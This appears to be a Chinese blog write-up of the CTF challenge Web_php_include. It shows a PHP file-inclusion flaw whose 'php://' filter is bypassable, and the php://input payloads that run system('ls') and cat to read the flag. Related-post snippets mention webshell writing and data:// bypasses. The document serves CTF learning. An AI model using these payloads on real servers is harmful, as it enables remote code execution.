Web_php_include 攻防世界

最新推荐文章于 2024-10-13 10:33:10 发布
最新推荐文章于 2024-10-13 10:33:10 发布
阅读量420 收藏
点赞数 2
文章标签: ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cppstdio/article/details/142415064
版权 
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参   

准备好一个Firefox  一个max hackbar     

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

<php
system("ls")
?>

随后得到fl4gisisish3r3.php   一般这种文件就是flag,

我们使用

<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是 

大懒的猫猫虫
关注
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3708
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
【网络安全 | CTF攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
热门推荐
等风来
05-22 1万+
PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1349
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界18-Web_php_include-CTFWeb进阶
LH1013886337的博客
10-13 286
看名字可能是文件包含的题和。
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4800
ctf学习记录
攻防世界 web进阶区 Web_php_include
m0_51395584的博客
06-15 269
打开链接,直接是代码审计 从代码中可以知道,可以有两个get参数请求,分别是hello和page,hello的参数直接返回,我们主要看page参数的处理。 strstr()函数会检测$page参数中是否存在php://,如果存在,则进入循环,否则返回false,str_replace()函数会将page中的’hp://替换为空,因为是while循环,所以会替换所有的php://,包括拼接的。 由此可知该题考查的是php伪协议的利用,这里可以进行大小写绕过,同时还可以使用另一个伪协议data://text/
攻防世界---Web_php_include
2201_75556700的博客
04-14 688
6.构造下面url,读取fl4gisisish3r3.php内容。5构造下面url,读取该路径的文件。4.构造下面url,得到目录路径。在网页上显示文本。
Web_php_include-攻防世界
szhangliwenya的博客
03-25 1329
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 507
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
攻防世界Web_php_include
qq_45955869的博客
05-27 78
提示:Web_php_include
攻防世界WEB——Web_php_include
Zeker62的博客
08-16 506
借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下 源代码是这样的 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 这里有几个函
攻防世界 Web_php_include(include)
Haowill的博客
04-15 1035
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
脑机接口电路与系统 Amir
11-02
脑机接口电路与系统 Amir
WaCRM:提升电商独立站用户的WhatsApp营销利器安装文件v3.1.0.zip
11-02
在当今数字化时代,企业与客户之间的沟通方式正在不断演变。WhatsApp作为全球最受欢迎的即时通讯应用之一,已成为企业与客户互动的重要渠道。为了帮助电商独立站用户更有效地利用这一平台,WaCRM应运而生。这款专为Windows平台设计的多账户WhatsApp CRM软件,提供了一系列强大的功能,旨在提升企业的营销和销售效率。 WaCRM的核心功能 多账户管理: WaCRM允许用户同时管理多个WhatsApp账户,这对于拥有多个电商品牌或产品线的独立站用户尤为重要。用户可以在一个界面内轻松切换不同账户,进行消息发送和客户管理,极大地提高了工作效率。 自动化功能: 通过设置自动回复和消息调度,用户可以确保在任何时候都不会错过潜在客户的询问。自动化的提醒功能也能帮助用户及时跟进客户,提升转化率。 群组管理: 在电商营销中,群组营销是一种有效的策略。WaCRM提供了强大的群组管理工具,用户可以轻松加入、管理和清理群组,确保信息传递的有效性和及时性。 数据提取与分析: WaCRM具备数据提取功能,用户可以从群组、联系人列表和聊天记录中提取有价值的信息。这些数据可以帮助电商独立站用户更好地
[文件]作业帮试卷上传.pdf
11-02
[文件]作业帮试卷上传.pdf
httpd-tools-2.4.6-99.el7.centos.1.x86_64.rpm
11-02
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh httpd-tools-2.4.6-99.el7.centos.1.x86_64.rpm
开题报告SpringBoot个人博客系统.docx
最新发布
11-02
毕业设计开题报告
深度学习灰狼优化算法 matlab
11-02
主要是使用灰狼算法对参数进行寻优,适用于初学者学习使用。
开题报告SpringBoot高校科研工作管理系统.docx
11-02
毕业设计开题报告
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种漏洞,应该对包含的文件进行严格验证,确保只包含可信的文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大懒的猫猫虫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值